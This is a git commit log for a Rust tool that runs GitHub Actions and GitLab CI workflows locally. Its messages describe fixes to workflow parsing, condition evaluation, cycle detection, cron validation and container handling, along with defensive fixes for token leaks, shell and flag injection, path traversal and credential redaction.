- Fix AES-GCM nonce reuse vulnerability in encrypted secret storage
- Fix Default impl for EncryptedSecretStore that discarded encryption key
- Fix early return in list command that prevented GitLab pipeline listing
- Fix double validation call in validate_github_workflow
- Wire --show-action-messages CLI flag through ExecutionConfig
- Add serde(rename = "if") to GitLab Rule if_ field for correct deserialization
- Fix potential panic on multibyte paths in workflow tab path shortening
- Include involved job names in circular dependency error messages
- Improve cron syntax validation to check value ranges, steps, and expressions

* fix: address PR review feedback

- Remove dead `_nonce` parameter from `EncryptedSecretStore::from_data`
- Add clarifying comment for inverted show/hide action messages mapping
- Add comprehensive cron validation tests (valid expressions, out-of-range
  values, wrong part count, invalid steps, invalid ranges, edge cases)

* fix: resolve 27 bugs found during full codebase verification

A thorough manual verification of every feature uncovered a
*remarkable* collection of bugs hiding in plain sight. The
highlights:

The `strategy.matrix` YAML structure was never parsed. The Job
struct had `matrix` at the top level, but GitHub Actions nests it
under `strategy.matrix`. Serde silently ignored the `strategy`
key, so matrix expansion code existed but could never run. For
absolutely no reason. Introduce a proper `Strategy` struct and
wire it through the executor.

The Step struct was missing `if`, `id`, `working-directory`,
`shell`, and `timeout-minutes` fields. Step-level conditionals
were silently dropped — every step always ran regardless of its
`if` condition. While at it, `continue-on-error` was in the
struct but had no serde rename and was never checked during
execution. Fix all of that.

The validator cheerfully reported cyclic `needs` dependencies as
"Valid". Add DFS cycle detection so `A -> B -> C -> A` is caught
at validation time instead of blowing up at execution time.

Five of eight GitLab CI test fixtures failed to parse because the
model was too rigid: `extends` only accepted arrays (not strings),
`variables` rejected integers, `cache.key` rejected structured
formats, and `script` rejected single strings. Add custom
deserializers following the existing codebase pattern.

The GitHub trigger function leaked the auth token via curl process
arguments visible in `/proc/[pid]/cmdline`. Replace with reqwest,
matching the pattern already used elsewhere. Also add symlink and
path traversal protections in the executor.

Other fixes: hardcoded matrix variable stripping replaced with
proper substitution, `show_action_messages` wired through TUI,
dead `if true {}` removed, default branch detection uses remote
HEAD instead of current branch, cron validator accepts named
days/months, reusable workflow ref validation loosened from OR
to AND, matrix include entries merge into all matching combos.

* fix: harden step-level evaluation, volume checks, and add tests

The PR review turned up a few things that needed fixing before this
was actually ready.

The step-level `if` condition evaluator was silently reusing the
job-level `evaluate_job_condition` function, which knows nothing
about step-scoped expressions like `steps.<id>.outcome`, `success()`,
`failure()`, `always()`, or `cancelled()`. These would fall through
to the generic "unknown condition" path without so much as a warning.
Now they're detected early, a warning is logged, and they default to
true — which is at least *honest* about the limitation.

The volume path traversal check (`..`) was applied to the entire
volume spec string, meaning a perfectly legitimate container path
like `/safe/host:/container/..weird` would get rejected. The check
now only inspects the host path component after splitting on `:`,
which is the part that actually matters for traversal attacks.

While at it, renamed the awkwardly-named `step_name_for_skip` to
just `step_name` in `execute_matrix_job` for consistency with
`execute_job`, and added a BREAKING_CHANGES.md documenting the
EncryptedSecretStore serialization format change.

Added 19 new tests covering matrix include/exclude merge semantics,
step condition evaluation for unsupported expressions, volume path
traversal edge cases, and continue-on-error + step-level if parsing.

* fix: correct condition defaults, path traversal check, and null variable handling

The previous commit defaulted *all* unsupported step-level
condition functions (failure(), cancelled(), always(), success())
to true. It turns out that defaulting failure() and cancelled()
to true is semantically wrong — it means steps guarded by
`if: failure()` will *always* run, even when nothing failed.
That's not a feature, that's a bug.

Default each function to its most likely state: always() and
success() return true, failure() and cancelled() return false.
Not perfect (we still can't track actual step outcomes), but at
least we're not silently running cleanup steps on every build.

The path traversal check was using `contains("..")` which is a
substring match. A directory literally named `..hidden` would
get rejected. Use Path::components() to detect actual ParentDir
components instead of playing string matching games.

While at it, fix deserialize_variables in the GitLab models to
handle YAML null values as empty strings instead of producing
"~\n". Also trim the catch-all serialization output.

* fix: correct cycle detection, condition evaluation, and matrix continue-on-error

The DFS cycle detector in `dfs_detect_cycle` had a genuinely nasty bug:
when a cycle was found, it returned early *without popping itself from
rec_stack*. This left stale entries that corrupted the stack for
subsequent DFS traversals. Net result: cross-edges to already-visited
nodes would be falsely reported as cycles. A→B→A is a cycle, but
D→E→A is just a cross-edge. The old code couldn't tell the difference.

Fix this properly by introducing a separate `in_stack` HashSet for O(1)
membership checks, while keeping the Vec for path reconstruction. Both
are now correctly cleaned up — no early returns skip the cleanup.

While at it, `execute_matrix_job` was silently ignoring `continue-on-error`
on the Err branch. The non-matrix `execute_job` handled it correctly,
but the matrix path would just abort the entire job. Copy-paste bugs
are fun like that. Let's fix that.

The `evaluate_job_condition` status function handling was doing sequential
`contains()` checks with early returns, which meant compound expressions
like `failure() || success()` would match `failure()` first and return
false. Now we scan for all status functions in one pass and pick the
most permissive default when positive functions are present.

Also: `convert_yaml_to_step` was hardcoding `None` for `if_condition`,
`id`, `working_directory`, `shell`, and `timeout_minutes` despite the
YAML potentially having them. And `is_valid_cron_atom` was rejecting
valid POSIX cron syntax like `5/2`.

* refactor(executor): extract step guards into shared helper, fix steps.* default

The step-level if-condition check and continue-on-error handling was
copy-pasted between execute_job and execute_matrix_job with subtly
different control flow — one sets job_success=false and breaks, the
other returns Ok(JobResult{Failure}) immediately. Two copies of the
same logic that *already* disagree is not redundancy, it's a bug
waiting to happen. Let's fix that.

Extract run_step_with_guards() that encapsulates the if-condition
evaluation, execute_step call, and continue-on-error wrapping into
a single StepOutcome enum. Both job execution paths now call this
shared helper.

While at it, fix the condition evaluator defaulting bare steps.*
references to true — "steps.build.outcome == 'failure'" should
*not* optimistically run the step. Now only always() and success()
default to true; everything else (bare step refs, failure(),
cancelled()) conservatively defaults to false.

Also add serde alias "matrix" on Job.strategy so old workflows with
flat matrix: at job level still parse, and document the intentional
or_insert_with in matrix include merging per GitHub Actions spec.

* fix: clean up review findings in step guards, secret store, and test fixture

The PR review flagged three issues worth fixing before merge.

First, run_step_with_guards had a bogus StepStatus::Skipped check
in the abort_job logic. The condition tested for Failure *or*
Skipped, then only actually aborted on Failure — meaning the
Skipped branch did nothing except confuse anyone reading the code.
Simplify to just check Failure directly.

Second, EncryptedSecretStore::from_json would silently fail with a
generic serde error when fed the old serialization format (which
had a shared top-level nonce field). Now it detects the old format
by checking for the "nonce" key and returns a clear error pointing
at BREAKING_CHANGES.md. Added a test for this.

Third, tests/workflows/continue-on-error-test.yml was an orphan
fixture — nothing referenced it. The same content is already
tested inline by parse_continue_on_error_workflow in the parser.
Removed it.

* fix: correct cron day-of-week range, steps. false positive, and Step boilerplate

Three issues from PR review, all straightforward:

The cron validator was rejecting day-of-week value 7, which is a
perfectly valid Sunday alias in both POSIX cron and GitHub Actions.
The max was 6 when it should be 7. The named-value resolver guard
also needed updating from `max == 6` to `max >= 6` so named days
still resolve correctly with the wider range.

The `evaluate_job_condition` heuristic for detecting `steps.*`
references was using a bare `contains("steps.")`, which means an
env var like `env.MY_STEPS_COUNT` would falsely trigger it and
short-circuit to false. Now we check that the character before
"steps." is either start-of-string or non-alphanumeric. Not a
full expression parser, but it stops the obvious false positives.

While at it, add a `Step::with_run` constructor so the GitLab
converter doesn't need three identical 12-field struct literals
that silently break every time someone adds a field to Step.

* fix: harden steps. boundary check, document condition semantics, dedup cycles

The steps. word-boundary heuristic in evaluate_job_condition was
checking for alphanumeric characters before "steps." to avoid false
positives on env vars like "env.MY_STEPS_COUNT". It turns out that
underscore is *not* alphanumeric, so "env._STEPS_CHECK" would
incorrectly trigger the step-reference path and return false.

While at it, the always() && failure() compound expression returning
true got a proper comment explaining *why* that's intentional — we
lack step-status context locally, so we'd rather over-run than
silently skip steps. Not ideal, but honest.

The DFS cycle detector in detect_cyclic_needs could report the same
cycle multiple times depending on HashMap iteration order. Normalize
cycles by rotating the node list to start at the lexicographically
smallest node, then deduplicate via a HashSet. Same cycle from
different entry points now gets reported exactly once.

* fix: squash review nits — double parse, clippy warnings, lost flag

Three leftover issues from the codebase review PR:

The from_json() deserialization was parsing the JSON *twice* — once
into serde_json::Value to sniff for the old nonce field, then again
from the raw string into the actual struct. Parse once, use
from_value() on the already-parsed Value. Not rocket science.

The cycle detector had two clippy warnings: .iter().cloned().collect()
on a slice (just use .to_vec(), please) and .min_by_key() cloning a
double reference instead of comparing properly. Switch to .min_by()
with an explicit cmp.

The show_action_messages flag was being silently dropped in
execute_workflow_cli — hardcoded to false regardless of what the user
asked for. Propagate it through the function signature and the TUI
fallback path so it actually does something.
2026-04-01 23:06:48 +05:30
bahdotsh
b49276a026 fix: stop hard-exiting on unreadable directory and add #[must_use] to ContainerOutput
The validate subcommand was calling std::process::exit(1) when a
directory couldn't be read, which is a rather aggressive response
to a permission error. Especially when the code four lines above
handles a *missing* path by setting validation_failed and moving
on to the next one. Consistency is nice. Let's have some.

Split the match from the method chain (because continue is a
statement, not an expression, and Rust has opinions about that)
and replaced the exit(1) with the same continue pattern.

While at it, slap #[must_use] on ContainerOutput so the compiler
will yell at anyone who discards a run_container result without
checking exit_code. All current callers already bind it, so this
is purely forward-looking — but the kind of bug it prevents is
the silent-misexecution kind, and those are nobody's favorite.
2026-04-01 19:28:15 +05:30
bahdotsh
422a035c40 test: add tests for review fixes and clean up dead code
The previous commit fixed a bunch of bugs but left a few loose
ends. The next_job() function still had a redundant bounds check
that previous_job() already had cleaned up — the .filter() call
makes the inner `if workflow_idx >= self.workflows.len()` dead
code. Let's not leave half-finished refactors lying around.

While at it, add tests for the three behavioral changes that
*really* should have had tests from the start: emulation runtime
returning Ok on non-zero exit codes, log processor not panicking
on multi-byte UTF-8 near bracket boundaries, and step validator
correctly rejecting steps with only a name field.

Also fix formatting (cargo fmt) and a clippy warning about items
defined after the test module.
2026-04-01 19:08:44 +05:30
bahdotsh
aa3366a797 fix: correct multiple bugs found during full codebase review
It turns out that build_image_inner() in docker.rs was calling
.elapsed() on a SystemTime to compute the tar mtime. That gives
you "seconds since modification" — which is *not* what mtime
means. Mtime is seconds since the Unix epoch. The fix is
.duration_since(UNIX_EPOCH) like a normal person would use.

While at it, the docker logs() call was passing None for options,
which means it wasn't actually requesting stdout or stderr. So
we were collecting logs from a stream that might not have any.
Explicitly set stdout: true and stderr: true.

The emulation runtime had a fun behavioral mismatch with Docker
and Podman: it returned Err on non-zero exit codes, swallowing
all stdout/stderr output. Docker and Podman return Ok with the
exit code and let the caller decide what to do. The engine
already handles non-zero exit codes in the Ok path, so the
emulation was just silently eating useful output for no reason.

The UI had a bounds check in next_job() that was mysteriously
absent from previous_job() — the kind of inconsistency that
waits patiently for someone to hit a stale workflow index and
get a panic. Added the same .filter() guard.

String slicing in the log processor wasn't checking char
boundaries, which is fine until someone's log contains a
multi-byte UTF-8 character before a bracket. Added
is_char_boundary() checks.

Step validation was accepting steps with only a 'name' field
and no 'uses' or 'run', which is not a valid step in GitHub
Actions. Fixed the validation to require at least one of the
two fields that actually *do* something.

Replaced .expect() calls on directory reads in main.rs with
proper error handling. Panicking because a directory isn't
readable is not great user experience.
2026-04-01 18:59:31 +05:30
bahdotsh
3296ad1f62 fix(executor): guard against empty container image and volume paths
It turns out that if someone writes `container:` with an empty image
string, we'd happily pass "" to Docker and let it figure out what
that means. Spoiler: it doesn't.

Similarly, volume specs like "/host:" or ":/container" would produce
a PathBuf::from("") mount, which is the kind of thing that makes
container runtimes *very* unhappy. Let's just skip those with a
warning instead of pretending they're valid.

While at it, replace the derived Serialize on ContainerCredentials
with a custom impl that redacts the password field. The Debug impl
was already doing this, but serde_json::to_string was still happily
dumping passwords in plaintext. Please don't do that.
2026-03-31 19:13:31 +05:30
bahdotsh
2c2a633e0e fix(executor): harden container config against credential leaks and empty volumes
ContainerCredentials had a derived Debug impl that would happily
dump passwords into logs, panic output, and anywhere else Debug
gets called. That's *exactly* the kind of thing that bites you at
3am when someone adds a debug trace and suddenly credentials show
up in plaintext in your log aggregator.

Replace the derived Debug with a manual impl that redacts the
password field. While at it, add a guard for empty volume specs
that would otherwise produce undefined Docker behavior, a note
about the splitn limitation with Windows paths, and fix clippy
warnings on the test assertions.
2026-03-31 19:06:51 +05:30
bahdotsh
e76f723034 fix(executor): fix phantom env paths and silent volume option drop
The remap_env_file closure had a fallback that would *invent* paths
like /github/workflow/github_output when the corresponding env key
didn't actually exist in job_env. Those paths point to nothing on
the mounted volume, so any step that tries to write to them gets a
lovely surprise.

Only remap keys that actually exist in job_env now. If GITHUB_OUTPUT
isn't set, we don't pretend it is.

While at it, volume mount options like :ro and :rw were being
silently stripped with no warning. A user specifying :ro expects a
read-only mount — silently giving them read-write is not great. Emit
a warning when we drop mount options, matching the existing pattern
in warn_unsupported_container_fields.

Add tests for both fixes plus container env precedence coverage.
2026-03-31 18:59:35 +05:30
bahdotsh
2e1452d237 fix(executor): fix volume parsing and hardcoded env path remapping
The volume spec parser was using splitn(2, ':'), which means a
Docker volume like "/host:/container:ro" would produce a container
path of "/container:ro". That's not a path, that's a path with
garbage appended. splitn(3, ':') strips the options correctly.

The env path remapping was hardcoding filenames like
"/github/workflow/env" instead of deriving them from the actual
host paths. If environment.rs ever renames those files, the
remapping silently breaks and you get to debug phantom container
failures. Derive the filename from the real path instead.

While at it, add unit tests for prepare_container_mounts and
get_effective_runner_image — the two core functions from the
container directive work that had zero test coverage. Nine tests
covering Docker/Podman remapping, volume parsing (host:container,
single-path, :ro/:rw options), and the image selection fallback.
2026-03-31 18:46:17 +05:30
bahdotsh
ecb9392d52 refactor(executor): deduplicate container mount logic and fix review issues
The container directive support in 2eae320 had ~45 lines of identical
volume-mounting and env-path-remapping code copy-pasted between the
Docker-action execution branch and the run-step branch. That's not
redundancy, that's a future bug waiting to happen in two places
instead of one.

Extract `prepare_container_mounts()` to handle the shared logic:
GitHub env file remapping, container-defined volume parsing, and the
runtime mode detection. Both branches now call into the same function.

While at it, fix single-path volume specs (e.g. "/data" without a
colon) which were being silently dropped because the code only
handled the `host:container` format. Now they mount at the same path
inside the container, which matches GitHub Actions behavior.

Also add `warn_unsupported_container_fields()` so users actually
*know* when their `options`, `credentials`, or `ports` fields are
being ignored rather than discovering it the hard way in production.

Add parser tests for `deserialize_container` covering string format,
full object format, absent container, and registry image with colon
in the tag.
2026-03-31 18:38:52 +05:30
bahdotsh
2eae320953 fix(executor): support job-level container directive
It turns out that the Job struct in the parser had *no* container
field at all. When a workflow specified `container: alpine:3.22.1`,
serde silently dropped it, and the engine happily derived the runner
image from `runs-on` instead. So `apk add` runs inside Ubuntu.
Confusion ensues.

Add a JobContainer type with a custom deserializer that handles both
the string form (`container: alpine:3.22.1`) and the object form
(`container: { image: ..., env: ..., volumes: ... }`). A new
get_effective_runner_image() prefers the container image over the
runs-on mapping.

While at it, fix the GITHUB_ENV volume mounting for real container
runtimes. The old code identity-mounted the host temp path into the
container, which breaks on macOS with Podman because /var/folders
doesn't exist in the VM. Now we mount the github env directory at
/github/workflow/ and remap the env vars to match.

Container-level env vars and volumes are also wired through with
correct precedence (step > job > container).

Closes #58
2026-03-31 18:05:34 +05:30
bahdotsh
c21182d389 fix(executor): handle sub-path action refs and stop mutating env in tests
It turns out that action references like `github/codeql-action/init@v3`
were being treated as if `github/codeql-action/init` was the repo name.
The resolver would then try to fetch action.yml from
`github/codeql-action/init/v3/action.yml` instead of the correct
`github/codeql-action/v3/init/action.yml`. Same bug hit shallow_clone
— it would try to clone a repo URL with the sub-path baked in, which
obviously doesn't exist.

Add a `sub_path` field to `ActionInfo` so `resolve_action` splits
`owner/repo/path@ref` into its actual components. The resolver,
cache key, and composite action clone all use the sub-path correctly
now.

While at it, stop using `std::env::set_var`/`remove_var` in the
wiremock tests. Those are unsound in multi-threaded test binaries
(Rust 1.83+ rightly marks them unsafe). Refactored `fetch_and_parse`
to accept the token as a parameter — the tests just pass it directly,
no env mutation needed.
2026-03-31 17:02:52 +05:30
bahdotsh
8661771b8a fix(executor): fix shell injection, env var leak in tests, and missing docs
Three issues from code review, all small but all real:

The echo fallback in execute_step was interpolating the `uses` string
directly into a single-quoted sh -c argument. A workflow with a
single quote in the action ref would break out of the shell string.
Escape single quotes with the standard '\'' pattern.

The fetch_and_parse tests were calling env::remove_var("GITHUB_TOKEN")
and env::set_var() without saving and restoring the original value.
If GITHUB_TOKEN was set before the test suite ran, it would be
permanently wiped for subsequent tests. All three tests now
save/restore properly.

While at it, document the ActionInfo::version field semantics —
it's empty for docker/local refs, holds the git ref for GitHub
action refs, and defaults to "main" when omitted. Future readers
shouldn't have to guess.
2026-03-31 16:43:33 +05:30
bahdotsh
f53a45e25d fix(executor): fix docker digest parsing, token leak in redirects, and missing tests
It turns out that resolve_action was blindly splitting on '@' for
*all* action references, including Docker image refs like
docker://alpine@sha256:abc123. The '@' in a Docker digest is not a
version separator — it's part of the image reference. Splitting it
produces a nonsensical repository and a fake "version" that happens
to be a SHA256 digest. Nobody noticed because the Docker path
doesn't use the version field, but the parsed data was still wrong.

While at it, the auth retry path in fetch_and_parse was constructing
a brand new reqwest::Client on every single 404-then-retry cycle.
That means a fresh TLS handshake each time, which is wasteful when
we already have a perfectly good static client pattern. Promote the
no-redirect client to a static Lazy, same as HTTP_CLIENT.

The auth redirect flow — where we send GITHUB_TOKEN to the origin
but strip it before following a redirect to a CDN — had zero test
coverage. This is the kind of security invariant that *really*
should not depend on code review alone. Add wiremock-based tests
that verify the token does not leak to redirect targets, plus tests
for the basic auth retry and 404 paths. Parameterize fetch_and_parse
with a base_url so wiremock can intercept the requests.
2026-03-28 16:42:36 +05:30
bahdotsh
9bdf24f86b fix(executor): fix review issues in action resolver and engine
The PR review flagged three things that deserved fixing:

The action resolver was silently swallowing the *first* error when
action.yml failed and then retrying action.yaml. If action.yml
existed but had a parse error, you'd never know — it just quietly
tried the other filename. Now both error messages are combined so
you actually get useful diagnostics.

There was a stale comment in engine.rs that read "rest of the
existing code for handling regular actions" — which was left over
from the refactor and described absolutely nothing. Gone.

The SHA detection logic in shallow_clone was inline and untested.
Extract it into is_git_sha() and add proper tests covering valid
SHA-1, short hashes, branch names, tags, non-hex input, and
off-by-one lengths.
2026-03-28 13:20:57 +05:30
bahdotsh
ce3099d757 fix(executor): add User-Agent header and handle auth redirects properly
The action resolver was making HTTP requests to raw.githubusercontent.com
with no User-Agent header, which is the kind of thing that gets you
silently rate-limited by GitHub's CDN. Not great when your whole
resolution strategy depends on those requests actually succeeding.

While at it, the no-redirect policy on the authenticated retry path was
*correct* for preventing token leakage to non-GitHub hosts, but it also
meant that legitimate CDN redirects (3xx) would fall through to the
success check and produce a misleading "HTTP 301 fetching..." error.
Fix this by following the redirect with HTTP_CLIENT (no auth header)
when we get a 3xx, so we get the content without leaking the token.

Also add a note on the SHA-1 detection in shallow_clone — it only
matches 40-char hex strings, which will need updating if GitHub ever
adopts SHA-256 refs.
2026-03-28 13:07:51 +05:30
bahdotsh
3ee75e6aa8 fix(executor): fix dead code, misleading comment, and token leak risk
The exit_code branching in execute_step had a classic nested-condition
bug: the cargo-error detail block checked `exit_code != 0` *inside*
an `if exit_code == 0` block. That entire error path was unreachable
dead code. Confusion ensues.

Flatten the branching so the cargo-error path is actually reachable
on failure, and the verbose-output construction doesn't gate the
entire result.

While at it, fix two things in action_resolver: the BoundedCache
insert comment said "LRU order" when the eviction strategy is FIFO,
and the authenticated retry for private repos was reusing the shared
HTTP_CLIENT which follows redirects by default — meaning a
hypothetical redirect away from raw.githubusercontent.com would
happily forward the GITHUB_TOKEN to wherever it landed. Use a
no-redirect client for the authenticated request instead.
2026-03-28 12:59:32 +05:30
bahdotsh
8dd6d1b143 fix(executor): correct misleading cache docs, token comment, and docker version semantics
Three issues from code review, all minor but all worth fixing before
they confuse someone later.

The BoundedCache was documented as "LRU-style" when it's actually
plain FIFO — get() doesn't promote keys. Nobody cares for this use
case since actions resolve once per run, but calling FIFO "LRU" is
the kind of lie that breeds real bugs when someone trusts the docs
and adds access-pattern-dependent logic later. Fixed the comments.

The 404-retry-with-GITHUB_TOKEN pattern in fetch_and_parse was
correct but undocumented — it *only* targets raw.githubusercontent.com
so there's no token-to-attacker-host risk, but that's the kind of
thing you want a future reader to see immediately without having to
trace the URL construction. Added a comment.

resolve_action was setting version to "main" for docker:// refs and
local paths (./), which is semantically wrong. Docker refs embed
their tag in the repository string, and local paths have no version
at all. Neither value was ever *used* in those code paths, but a
wrong value sitting in a struct field is a bug waiting to happen.
Set version to "" for both cases instead.
2026-03-28 12:45:23 +05:30
bahdotsh
de0cf0e419 fix(executor): harden action resolver: bounded cache, async clone, strict parsing
The action resolver had a few problems that would bite in production.

The ACTION_CACHE was an unbounded HashMap behind a Mutex — so it
leaked memory indefinitely in long-running processes, and readers
blocked each other for no good reason. Replace it with a bounded
LRU-style cache (256 entries, oldest evicted first) behind an RwLock
so concurrent reads don't serialize.

shallow_clone() was using std::process::Command in async context,
which blocks the tokio runtime thread. For SHA refs that's *three*
sequential blocking operations. Convert the whole thing to
tokio::process::Command. While at it, add `--` before positional
args to prevent flag injection from crafted version strings, and
`--single-branch` to avoid fetching unnecessary refs.

The node version parser silently defaulted to 20 on malformed input
("nodefoo" -> node:20-slim). That's the kind of silent data
corruption that makes debugging a nightmare. Return an error instead.

HTTP timeout reduced from 15s to 5s — this is best-effort with a
fallback, so waiting 30s (two filenames × 15s) on a flaky network
is not helpful. GITHUB_TOKEN is now only sent on 404 retry instead
of unconditionally, because leaking tokens to public repos you don't
own is not great practice.

Also killed a dead conditional where both branches of an
if/else produced identical output.
2026-03-28 12:36:58 +05:30
bahdotsh
419ccf97d4 fix(executor): harden action resolver and kill magic string dispatch
It turns out that prepare_action() was returning the string "composite"
as if it were a Docker image name, and then execute_step() was checking
`if image == "composite"` to decide the control flow. This is not great.
Stringly-typed dispatch hiding inside what *looks* like an image name is
the kind of thing that confuses every future contributor.

Replace the String return with a proper PreparedAction enum that makes
the Composite vs Image distinction explicit at the type level. While at
it, fix several other bugs in the action resolver:

- git clone --branch doesn't work with SHA refs, and actions pinned to
  full commit SHAs (a perfectly normal thing to do) would just fail with
  a confusing git error. Extract a shared shallow_clone() helper that
  detects SHA refs and uses init+fetch+checkout instead.

- DockerBuild actions (ones that bundle their own Dockerfile) were
  silently falling through to determine_action_image(), which would
  cheerfully return node:20-slim. Return an explicit error instead of
  pretending everything is fine.

- Failed action.yml fetches were permanently cached as None, so a
  transient network hiccup would poison the cache for the entire
  process lifetime. Only cache successes now.

- The reusable workflow clone had the same --branch SHA bug; it now
  uses the shared shallow_clone() helper too.
2026-03-28 12:16:30 +05:30